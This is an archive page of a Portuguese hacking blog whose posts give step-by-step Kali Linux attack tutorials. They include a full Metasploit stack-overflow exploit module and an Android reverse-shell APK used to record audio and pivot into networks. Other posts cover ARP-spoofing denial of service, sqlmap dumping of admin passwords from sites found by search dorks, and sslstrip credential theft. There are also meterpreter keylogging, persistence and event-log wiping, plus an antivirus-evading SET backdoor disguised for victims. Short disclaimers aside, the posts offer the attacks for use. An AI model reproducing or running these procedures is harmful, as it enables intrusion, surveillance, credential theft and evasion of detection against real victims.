quarta-feira, 31 de julho de 2013

Resolvendo problema do wpscan pós-atualização do Kali Linux

Resolvendo problema do wpscan pós-atualização do Kali Linux 

 Após a atualização no meu Kali Linux, ao tentar utilizar a ferramenta wpscan, apareceu esse problema: 





Após uma breve procura pelo google, eu achei a solução. Que é bem simples, basta você digitar esses comandos no seu terminal:
# apt-get install ruby1.9.1
# apt-get install ruby1.9.1-dev

# apt-get install --reinstall gem
# gem install bundler
# bundle install --gemfile=/usr/share/wpscan/Gemfile
# apt-get update
vlw, até o próximo post !

 

terça-feira, 30 de julho de 2013

Adicionando exploit ao metasploit

 Adicionando Exploit ao MSF

Para adicionarmos um exploit ao metasploit, primeiramente devemos ter em mente as seguintes perguntas, por motivos de organização:
O que estou adicionando? Para qual sistema operacional ele é útil? O que ele
explora?

Entendeu mais ou menos?

Vou explicar. Vamos para o diretório padrão do msf, para isso digite:

root@bt:~# cd /pentest/exploits/framework3/
root@bt:/pentest/exploits/framework3# ls

HACKING documentation lib msfcli msfelfscan msfmachscan msfpescan msfweb test
README erros.txt lista.txt msfconsole msfencode msfopcode msfrpc plugins tools
data external modules msfd msfgui msfpayload msfrpcd scripts 
root@bt:/pentest/exploits/framework3#

Estamos no diretório padrão do msf (Na verdade o diretório padrão fica em
/opt/metasploit3/msf3/, este diretório é apenas um link simbólico.).
Agora entre no diretório modules:

root@bt:/pentest/exploits/framework3# cd modules/

Agora em exploits. (O que estou adicionando?)

root@bt:/pentest/exploits/framework3/modules# cd exploits/

Em windows. (Para qual sistema operacional ele é útil?)

root@bt:/pentest/exploits/framework3/modules/exploits# cd windows/

E por fim em misc. (O que ele explora?)

root@bt:/pentest/exploits/framework3/modules/exploits/windows# cd misc/

Ok, agora vamos adicionar nosso exploit neste diretório que estamos. Vamos dar o nome de "exploit_stackoverflow.rb". A extensão ".rb" significa que o exploit foi desenvolvido na linguagem Ruby. Utilizarei o nano, mais utilize o editor de sua
preferência.

root@bt:/pentest/exploits/framework3/modules/exploits/windows/misc# nano
exploit_stackoverflow.rb

Agora insira o exploit abaixo:

http://pastebin.com/raw.php?i=H26uL5ih

#
# Custom metasploit exploit for vulnserver.c
# Written by Peter Van Eeckhoutte
#
#
require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote


include Msf::Exploit::Remote::Tcp


def initialize(info = {})
super(update_info(info,
'Name' => 'Custom vulnerable server stack overflow',
'Description' => %q{
This module exploits a stack overflow in a
custom vulnerable server.
},
'Author' => [ 'Peter Van Eeckhoutte' ],
'Version' => '$Revision: 9999 $',
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1400,
'BadChars' => "\x00\xff",
},
'Platform' => 'win',


'Targets' =>
[
['Windows XP SP3 En',
{ 'Ret' => 0x7c874413, 'Offset' => 504 } ],
['Windows 2003 Server R2 SP2',
{ 'Ret' => 0x71c02b67, 'Offset' => 504 } ],
],
'DefaultTarget' => 0,


'Privileged' => false
))


register_options(
[
Opt::RPORT(200)
], self.class)
end


def exploit
connect


junk = make_nops(target['Offset'])
sploit = junk + [target.ret].pack('V') + make_nops(50) + payload.encoded
sock.put(sploit)


handler
disconnect


end


end




Créditos do exploit para: “Peter Van Eeckhoutte


Salve com "Ctrl + X", informe que quer salvar pressionando Y e ENTER.

Ok, se ocorreu tudo certo aqui, basta abrirmos o msfconsole e ver nosso exploit recém adicionado.

root@bt:/pentest/exploits/framework3/modules/exploits/windows/misc#msfconsole



Agora vamos procurar pelo exploit "exploit_stackoverflow", para isso digitamos o comando search. (Óbvio não?). Veja na figura abaixo.



Meterpreter para Android



Há um tempo atrás, começou uma movimentação entre o pessoal que cuida de um fork do Metasploit, para desenvolver diversas funcionalidades que não existem na versão original mantida atualmente pela Rapid7. E dentre essas funcionalidades, está o Meterpreter Java portado para Android.

Já tem um bom tempo que estamos no aguardo de um Meterpreter para Linux, pois só havia uma versão para Windows, e algumas tentativas para o Linux, mas essa versão para Android, também é hiper bem vinda!

Para quem quiser dar uma olhada nessa nova funcionalidade, basta baixar essa versão do Metasploit, ou fazer a atualização de sua instalação com o comando ./msfupdate.

Logo abaixo, vocês podem ver o resultado desse comando atualizando o Metasploit com essa funcionalidade:

./msfupdate 
[*]
[*] Attempting to update the Metasploit Framework...
[*]

[...]
 create mode 100644 external/source/javapayload/androidpayload/library/src/androidpayload/stage/Meterpreter.java
 create mode 100644 external/source/javapayload/androidpayload/library/src/androidpayload/stage/Shell.java
 create mode 100644 external/source/javapayload/androidpayload/library/src/androidpayload/stage/Stage.java
 create mode 100644 external/source/javapayload/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java
 create mode 100644 external/source/javapayload/androidpayload/library/src/com/metasploit/meterpreter/android/stdapi_fs_file_expand_path_android.java
 create mode 100644 external/source/javapayload/androidpayload/library/src/com/metasploit/meterpreter/android/stdapi_sys_process_get_processes_android.java


Além disso, podemos visualizar se o mesmo já está instalado:
./msfpayload -l | grep -i android
    android/meterpreter/reverse_tcp                  Connect back stager, Run a meterpreter server on Android
    android/shell/reverse_tcp                        Connect back stager, Spawn a piped command shell (sh)



E para testá-lo, podemos criar um payload que permite termos uma conexão reversa:

./msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.102 R > shell.apk


É interessante, que nesse caso específico, precisamos definir que o formato de saída do payload será RAW (por isso o parâmetro "R"), mas nesse caso em específico, apesar da saída ser RAW, o msfpayload cria um arquivo APK no formato específico do Android. Vejamos:

file shell.apk 
shell.apk: Zip archive data, at least v2.0 to extract

Depois de criado o arquivo, basta que instalemos o mesmo em um dispositivo Android, para vermos seu funcionamento. Mas antes de instalá-lo, vamos deixar nossa máquina escutando, à espera de uma conexão vinda do dispositivo Android:


./msfcli multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=0.0.0.0 E


Na imagem acima, podemos ver a conexão reversa sendo realizada e o resultado do comando sysinfo.

Com esse meterpreter, podemos tirar fotos a partir da câmera do dispositivo Android, tanto a dianteira quanto a traseira, se houver. Outras duas interessantes possibilidades, é acionar o microfone do dispositivo para gravação de áudio ambiente e de ligações, e também a utilização do terminal do dispositivo como se fosse um micro remoto. Obviamente que existem outras, e deixo vocês testarem por conta própria :-)


Ok, até aí, quando pensamos em usuários comuns, não vejo muitos problemas, a não ser, obviamente, a invasão de privacidade. Por exemplo, imagine você sendo chantageado, porque um cara descobriu que em sua última ida ao motel, não foi sua esposa que lhe acompanhou (ou vice-versa) ;-)

Mas pensemos em uma grande corporação, onde  o termo BYOD (Bring Your Own Device) está em voga e sendo implementado (sem os devidos controles de segurança)... O que será que pode ser descoberto gravando o áudio de um dispositivo utilizado por um executivo durante suas reuniões? E as fotos dos locais que ele frequenta?

Mas ainda assim isso é pouco...

Acredito que os(as) senhores(as), que já utilizaram o Metasploit (principalmente quem já fez algum curso de pentest comigo) conheçam o termo pivoting, que basicamente é a utilização de uma sessão do meterpreter, sendo utilizada como rota para tráfego de rede. Podemos fazer isso com o portfw também, como descrito nessa documentação da Offensive Security - http://www.offensive-security.com/metasploit-unleashed/Portfwd . Executando o comando abaixo, realizamos isso:

meterpreter> portfwd add -l 80 -r 192.168.100.10 -p 80
[*] Local TCP relay created: 0.0.0.0:80 <-> 192.168.100.10:80

Com esse procedimento, qualquer dispositivo Android que tenha acesso à rede interna de uma companhia, e que tenha sido comprometido por um atacante, torna-se uma porta de entrada para todos os recursos acessíveis para o funcionário dono do mesmo. E se esse funcionário, mais uma vez, for um executivo? E se esse executivo deixa seus filhos utilizarem seu smartphone ou tablet para instalar joguinhos sem conhecer a procedência ou confiabilidade dos mesmos?

Durmam com isso na mente!

Essa é uma preocupação que eu mesmo tenho, já que atuo com forense. Podem ver minha palestra sobre forense em Android aqui:
Vídeo - http://hackproofing.blogspot.com.br/2013/05/video-de-palestra-androids-forensic.html
Slides - http://hackproofing.blogspot.com.br/2012/05/slides-androids-forensics-you-shot.html



Creditos: Luiz Vieira....

Instalando e fazendo as configurações iniciais do Kali Linux no Virtual Box

 como instalar e configurar o Kali Linux no Virtual Box bem como fazer as configurações iniciais que na minha opinião são indispensáveis.
O Kali Linux é uma evolução do Backtrack e pode ser baixado aqui http://www.kali.org, ele é mantido pela mesma empresa de segurança do Backtrack.
Algumas vantagens que vi no Kali é que ele é baseado em Debian e muitas ferramentas que davam algum problema no Backtrack, aqui até o momento funcionam sem problemas.
Vou mostrar como criar a máquina virtual, instalar o Kali, instalar o VBOX additions, TOR e também o EtherAPE que tinha no backtrack e não por padrão no Kali. No final vou colocar um link com uma série de tutoriais que podem ser executados usando o Kali. Vamos lá?
1 – Criar a máquina virtual:
Vamos criar uma nova e atribuir um nome
ScreenHunter_07 Apr. 03 16.09
Aqui vamos atribuir a quantidade de memória RAM, no caso coloquei 1GB
ScreenHunter_08 Apr. 03 16.09
Vá avançando nas opções padrão até chegar no tamanho do disco, no caso, coloquei 50GB
ScreenHunter_11 Apr. 03 16.10
Antes de inicializar a máquina vá em configurações da VM e mude a placa de rede para Bridged Adapter, isso para que a VM possa acesar o próprio hardware da máquina física.
ScreenHunter_11 Apr. 03 16.11
Nesta opção selecione o CD-ROM e escolha o arquivo ISO do Kali Linux que foi baixado do site
ScreenHunter_12 Apr. 03 16.11
2 – Instalar o Kali Linux
Tudo feito corretamente, bastar iniciar a VM e a tela inicial será essa onde podemos escolher a opção “Graphical Install”
ScreenHunter_12 Apr. 03 16.12
Nesta tela e nas seguintes será possível configurar o idioma, teclado e fuso horário, faça as configurações conforme achar melhorScreenHunter_13 Apr. 03 16.12
Aqui podemos definir um hostname que desejarmos, e na próxima tela, pode ser colocado um sufixo, caso vc tenha um, ou pode deixar em branco mesmo
ScreenHunter_14 Apr. 03 16.14
Defina a senha do usuário Root
ScreenHunter_15 Apr. 03 16.15
Avançando até essa tela podemos usar a primeira opção para o particionamento do disco, a próxima tela é só avançar
ScreenHunter_16 Apr. 03 16.16
Nessa tela, podemos selecionar a primeira opção e avançar
ScreenHunter_18 Apr. 03 16.16
Podemos avançar, e na próxima tela selecionar “YES”
ScreenHunter_18 Apr. 03 16.17
Aguarde a instalação, e nessa, parte se você sua rede já configurada para fornecer um IP e com acesso a internet, vc pode selecionar a opção “Yes”.
ScreenHunter_19 Apr. 03 16.36
Caso tenha um proxy você pode configurar aqui ou simplesmente deixar em branco e avançar
ScreenHunter_20 Apr. 03 16.36
Selecione “Yes” e aguarde a conclusão da Instalação, Ao reiniciar é logar com usuário Root e a senha que vc configurou.
ScreenHunter_20 Apr. 03 16.44
3 – Configurações iniciais.
O primeiro passo é instalar o VBOX Additions para isso faça o seguinte abra um terminal e digite:
apt-get update && apt-get install -y linux-headers-$(uname -r)
Aguarde a conclusão da instalação
Feito isso vá no Menu “Devices” do Virtual Box e clique em “Install Guest Additions”
ScreenHunter_20 Apr. 03 16.57
Quando for exibido essa tela, clique em cancelar
ScreenHunter_20 Apr. 03 17.00
Execute agora os seguintes comandos no terminal.
cp /media/cdrom0/VBoxLinuxAdditions.run /root/
chmod 755 /root/VBoxLinuxAdditions.run
./VBoxLinuxAdditions.run
Aguarde a conclusão da instalação e reinicie a VM
Após reiniciar, outra coisa que podemos configurar é o metasploit framework para isso faça o seguinte, abra um terminal e digite:
service postgresql start && service metasploit start
aguarde a conclusão e depois digite:
update-rc.d postgresql enable && update-rc.d metasploit enable
Para iniciar basta acessar conforme a imagem
metasploit-kali-metasploit-framework
Outra configuração inicial interessante de se fazer é a configuração do TOR para navegação anônima para isso vamos fazer o seguinte:
apt-get install tor tor-geoipdb polipo vidalia
Feito isso digite
mkdir /var/run/tor
chmod 700 /var/run/tor/
Vamos configurar o polipo para acessar através do tor para isso digite
vim /etc/polipo/config
Descomente as linhas
allowedClientes 127.0.0.1
socksParentProxy = “localhost:9050?
socksParentType = socks5
salve e saia do arquivo e digite
service tor restart
service polipo restart
Daí para navegar anônimo basta configurar no navegador o proxy http para 127.0.0.1 porta 8123 ou proxy socs5 para 127.0.0.1 porta 9050
Também pode ser usado para configurar em outras aplicações que suportem acesso via proxy
Para instalar o EtherApe basta digitar
apt-get install etherape
Aguarde a conclusão e ele vai estar disponível em Applications/Internet.

Realizando um ataque de negação de serviço usando tcpkill – Dos (Ethical Hacking)

Para esse tutorial estou usando o Kali Linux, para instalar e configurar essa ferramenta vc pode seguir essa nossa dica aqui
O primero passo é habilitar o repasse entre as interfaces de rede para isso faça o seguinte:
# echo 1 > /proc/sys/net/ipv4/ip_forward
Abrir 4 terminais como root
No primeiro, executar o arpspoof e no segundo também, de uma vítima para outra e virce-versa.
# arpspoof -i eth0 -t vm1 vm2
# arpspoof -i eth0 -t vm2 vm1
Troque VM1 pelo IP do Servidor que está executando um determinado serviço, SSH, FTP, RDP etc..
Troque VM2 pelo IP da Vítima que não vai conseguir acessar o servidor.
Em outro terminal digite esse comando
# dsniff -i eth0
Por último digite esse em outro terminal
# tcpkill -i eth0 dst vm1 and dst port 22
Troque VM1 pelo IP do Servidor e coloque a porta deseja que seja derrubada, 22, 3389, 21 etc
Espero que tenham gostado da dica.
Usem com sabedoria

SQLMAP SQL Injection para quem está iniciando

Lembre-se que o uso incorreto dessa técnica é crime, e o meu objetivo de mostrar essas informações aqui é apenas para aprendizado e testes em ambientes controlados e ou clientes.
Abra um terminal no backtrack e vamos usar a ferramenta SQLMAP
OBS: 24/4/2013 é perfeitamente possível e recomendável usar o Kali Linux para seguir esse tutorial, para isso basta executar o comando sqlmap + (parametros) direto no terminal sem entrar em nenhum diretório específico. E se vc seguiu nossa dica de instalação do Kali Linux e configurou o TOR vc pode usar ao final de cada comando digitado o parametro –tor (dois traços) e fazer as auditorias de forma anônima segue o link da dica:
cd /pentest/database/sqlmap
Vamos executar o sqlmap
./sqlmap.py -u http://www.exemplo.com/viewfaculty.php?id=12 –-dbs
Você precisa ter um alvo vulnerável para conseguir, para saber se o alvo é vulnerável, basta por uma ‘ no final da url e dar “enter” se retornar algum erro de banco de dados o alvo é vulnerável. Pode ser usar o google para isso fazendo por exemplo a seguinte buscainrul:noticias.php?id=1 Existem várias outras possibilidades que podem ser usadas para busca.
O campo “current database” vai mostrar o nome do BD vulnerável, daí basta usarmos as opções para explorarmos. Podemos listar todas as tabelas.
./sqlmap.py -u http://www.exemplo.com/viewfaculty.php?id=12 -D NOMEDOBD –-tables
Devemos trocar NOMEDOBD pelo valor obtido em “current database”
O Resultado vai ser algo parecido com isso:
Screenshot-4
Daí podemos escolher uma tabela e listar as colunas
./sqlmap.py -u http://www.exemplo.com/viewfaculty.php?id=12 -D NOMEDOBD
 -T admin –-columns
O resultado será parecido a esse:
Screenshot-6
Podemos escolher quais colunas queremos extrair informações
./sqlmap.py -u http://www.exemplo.com/viewfaculty.php?id=12 -D NOMEDOBD
 -T admin -C id,passwrd,u_name –-dump
Entendendo as técnicas é possível extrair todos os dados que desejar do Banco vulnerável

Explorando vulnerabilidade em roteador tp-link

vulnerabilidade encontrada nos roteadores TP-Link WR740N, WR740ND and WR2543ND
Essa vulnerabilidade permite a captura do conteúdo do arquivo shadow que contém as senhas de acesso ao roteador.
Para conseguir essa informação você pode usar o burp-suite disponível no backtrack, para isso abra a ferramenta, vá em repeater, digite o ip do alvo e clique em go. após isso vc pode editar a requisição conforme abaixo e clicar em go novamente o resultado será semelhante ao abaixo.
ScreenHunter_06 Mar. 11 18.40
Agora com um pouco mais de trabalho vc consegue consegue quebrar essa senha

Usando o nmap para verificação de vulnerabilidades

como usar o nmap para checar a existência da vulnerabilidade MS08-067, para quem não conhece essa vulnerabilidade pode ser explorada pelo Worm Conficker. Algumas ferramentas como Metasploit também podem ser usadas para explorar essa vulnerabilidade, basta usar o seguinte comando:
nmap --script smb-check-vulns.nse -p445 <host> (No de um host alvo apenas)



"nmap -PN -T4 -p139,445 -n -v --script=smb-check-vulns --script-args
safe=1 [target networks] (No caso de escanear todo um segmento de rede)"

A resposta será algo parecido com isso informando se o alvo é vulnerável ou não

Host script results:
| smb-check-vulns:  
|   MS08-067: NOT VULNERABLE
|   Conficker: Likely CLEAN
|   regsvc DoS: regsvc DoS: NOT VULNERABLE
|   SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
|   MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_  MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
Caso vc encontre uma máquina vulnerável vc pode explorer essa falha usando essa dica aqui

Usando sslstrip para capturar credenciais (MITM – Ethical Hacking)

Para realizar este ataque usei como “homem do meio” uma máquina com Kali Linux, uma distribuição Linux específica para pentest.
Caso precise de ajuda para instalação e configuração dessa ferramenta pode ver aqui
Para o meu teste tenho o seguinte cenário, para que você possa fazer o teste basta adaptar ao seu cenário.
IP da Vítima: 192.168.2.12
IP do default gateway 192.168.2.2
Vamos lá!
Usando o Kali Linux abra 4 terminais e deixe eles logados como “root” usando o comando “sudo su”. OBS: Creio que isso facilita para quem talvez não tenha muita experiência com linux, caso tenha experiência use os terminais como achar melhor.
Em um dos terminais digite o seguinte comando:
echo 1 > /proc/sys/net/ipv4/ip_forward (habilita o redirecionamento de pacotes)
No segundo terminal digite o seguinte o seguinte
iptables -t nat -A PREROUTING -p tcp –dport 80 -j REDIRECT –to-port 1000 (redireciona os pacotes da porta 80 para porta 1000 da máquina do atacante)
No terceiro terminal digite
arpspoof -i eth0 -t 192.168.2.12 192.168.2.2 (Lembre-se de adaptar de acordo com seu ambiente, esse comando vai “envenenar” a tabela arp da vítima fazendo com que ele mande todo trafego que ia para o gateway para o atacante)
No quarto terminal digite o seguinte:
sslstrip -l 1000 (vai ler todos os dados na porta 1000)
De volta no primeiro terminal digite o seguinte:
ettercap -Tq -i eth0 (Aqui é onde vamos ver o que queremos)
Após esse passo a “vítima” deve acessar algum site que seja necessário autenticação, gmail, hotmail, facebook, twitter, etc…
Se tudo foi feito corretamente você vai ter uma tela semelhante a essa.
ScreenHunter_21 Apr. 22 18.56
Conforme pode se ver na imagem acima, marcado em vermelho, após a vítima fazer uma autenticação, será exibido o login e senha da pessoa.
Lembre-se que isso deve ser feito apenas em ambientes controlados ou com as devidas autorizações.

Usando Kali linux para fazer um ataque de DNS Spoofing com Ettercap

Esse tipo de ataque é muito importante para conseguirmos algumas credenciais durante a execução de um PenTest. Ele consiste em enviar respostas falsas a requisições de DNS que forem feitas.
Para executarmos esse ataque a primeira coisa que queremos é editar o arquivo etter.dns, basicamente ele é como o arquivo hosts do windows e linux, nele podemos configurar para onde as solicitações serão enviadas.
Vamos lá, abra um terminal e digite
# vi /usr/share/ettercap/etter.dns

ScreenHunter_23 Apr. 25 15.32
Podemos editar seguindo o padrão que pode ser visto na imagem acima, salve e saia e após digite ettercap -G que vai abrir o Ettercap em modo gráfico.
Vá em Sniff –> Unified Sniffing e quando solicitado escolha sua placa de rede eth0.
ScreenHunter_23 Apr. 25 15.38
Agora vá em “Hosts” e clique em “Scan for hosts”
Vá novamente em “Hosts” Clique em Host List para visualizar uma lista de todos IP’s disponíveis na rede, selecione qual será a vítima que vai receber as respostas falsas e clique em Add to Target 1
ScreenHunter_23 Apr. 25 15.41
Agora clique em Start –> Start Sniffing.
Após isso vá em MitM –> Arp Poisoning.
Selecione a opção Sniff remote connections conforme abaixo e clique em OK
ScreenHunter_23 Apr. 25 15.45
Agora vá em Plugins –> Manage the Plugins e de um duplo clique em dns_spoof
ScreenHunter_23 Apr. 25 15.47
Feito isso o cliente selecionado vai começar a receber respostas falsas de DNS.
Esse ataque é extremamente eficaz quando usado em conjunto com essa nossa dica aqui abaixo para conseguir credenciais

segunda-feira, 29 de julho de 2013

Tutorial Kali Linux - Comandos Meterpreter

Olá mais uma vez,
Esse tutorial tem como objetivo mostrar como usar o Metasploit Framework para explorar uma máquina alvo, nesse tutorial partimos do princípio que vc já abriu uma sessão no meterpreter, caso ainda não tenha conseguido pode tentar algumas de nossas dicas como essa aqui: 
Após abrir a sessão a melhor sugestão é migrarmos para um processo mais estável e que torne mais difícil vc ser detectado para isso precisamos listar todos os processos disponíveis usando o comando ps
Será exibido uma tela semelhante a essa



Aqui podemos visualizar todos os processos em execução, uma sugestão é migrarmos para o processo explorer.exe para isso precisamos localizar esse processo na lista e ver qual o valor do PID daí migramos para ele usando o comando migrate 1708 (troque o número 1708 pelo número do seu PID)

Seguem-se agora algumas opções:

sysinfo - esse comando vai mostrar qual a versão do windows da máquina alvo.
 
getsystem – Eleva o nível de privilégio para SYSTEM

ipconfig – Mostra o endereço ip da máquina alvo

screenshot – Salva um arquivo JPEG com um print da tela do computador alvo

keyscan_start – Inicia o keylogger ou seja captura tudo que for digitado no teclado do computador alvo
keyscan_dump - Visualiza os dados capturados após o keyscan_start.

keyscan_stop – Para a captura

run persistence -X - Esse comando configura a máquina alvo para que a cada boot no sistema ela estabeleça novamente a conexão com a máquina atacante.

hashdump – faz a captura do hash de senhas do computador alvo.

execute – Executa um aplicativo ex. execute -f calc.exe

shell – Abre um prompt de comando

clearev - Limpa os logs de eventos do Windows, ou seja, apaga possíveis rastros deixados por vc.

Bom essas são apenas algumas dicas  pra vocês irem brincando um pouco. :)
Usando o comando help vc também pode descobrir várias outras opções.

Espero que tenham gostado e até a próxima.


Tutorial Kali Linux - Criando um backdoor para controlar PC’s remotamente

Criando um backdoor para controlar PC’s remotamente

Hoje mostrarei como usar o SET (social engineering toolkit) disponível no Kali Linux para criarmos um backdoor que pode ser utilizado para controlar remotamente computadores Windows. Vamos criar um executável legítimo dificilmente detectado por algum antivírus, assim temos completo a um computador alvo.

obs: todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime.

Vamos lá !

Em primeiro lugar vamos acessar o menu Applications/Kali Linux/Exploitation Tools/Social Engineering Toolkit e clique em se-toolkit. Vai ser exibido um menu como esse abaixo visto na imagem. 

Neste menu de opções selecione a opção 1


 Nesse segundo menu selecione a opção 4




Nessa tela abaixo você deve informar corretamente o seu endereço ip, caso tenha dúvidas abra um novo terminal e digite ifconfig eth0 daí preencha corretamente esse campo.




Na tela abaixo, você deve escolher a segunda opção para criarmos uma conexão reversa, ou seja, a nosso computador alvo é quem fará a conexão ao atacante.





Na tela abaixo atente aos 3 passos que devemos tomar, primeiro no tipo de backdoor, digite o 16, na sequência devemos definir qual a portal local, na máquina do atacante, que ficará “escutando” as tentativas de conexão feitas pelo alvo, o padrão é a 443 daí é só digitar Enter, caso queira mudar a porta se ela já estiver sendo usada podemos digitar outro número e então dar enter, na sequência você é questionado se quer iniciar a escuta daí vc deve digitar :yes





Feito isso o backdoor será criado e nosso computador alvo começará a escutar as tentativas de conexão das máquinas alvo.
O executável criado fica na pasta /usr/share/set e se chama msf.exe
Devemos tornar ele um executável daí podemos abrir um novo terminal e digitar o seguinte comando

chmod +x /usr/share/set/msf.exe

Caso queira vc pode renomear esse arquivo para facilitar o processo de engenharia social, para convencer alguém a, por exemplo, instalar um programa novo. Ex: setup.exe

Agora precisa copiar esse executável para a máquina alvo e assim que ele for executado vai aparecer uma tela como essa abaixo.



Aqui ao digitar o comando sessions podemos listar os alvos já conectados.

Ao digitarmos sessions -i 1 (supondo que 1 seja o número da ID exibida através do comando sessions, caso outro número seja exibido basta trocar o 1 pelo número mostrado) vamos poder interagir com a máquina alvo tendo acesso completo a ela. Em breve publicarei algumas dicas de comandos que podem ser usados para explorar uma máquina alvo.

Espero que tenham gostado da dica e não esqueça de compartilhar. vlw!




← Postagens mais recentes Postagens mais antigas → Página inicial
Copyright © Hacking & Security | Powered by Xandao Design by Xandao86 | Xandao86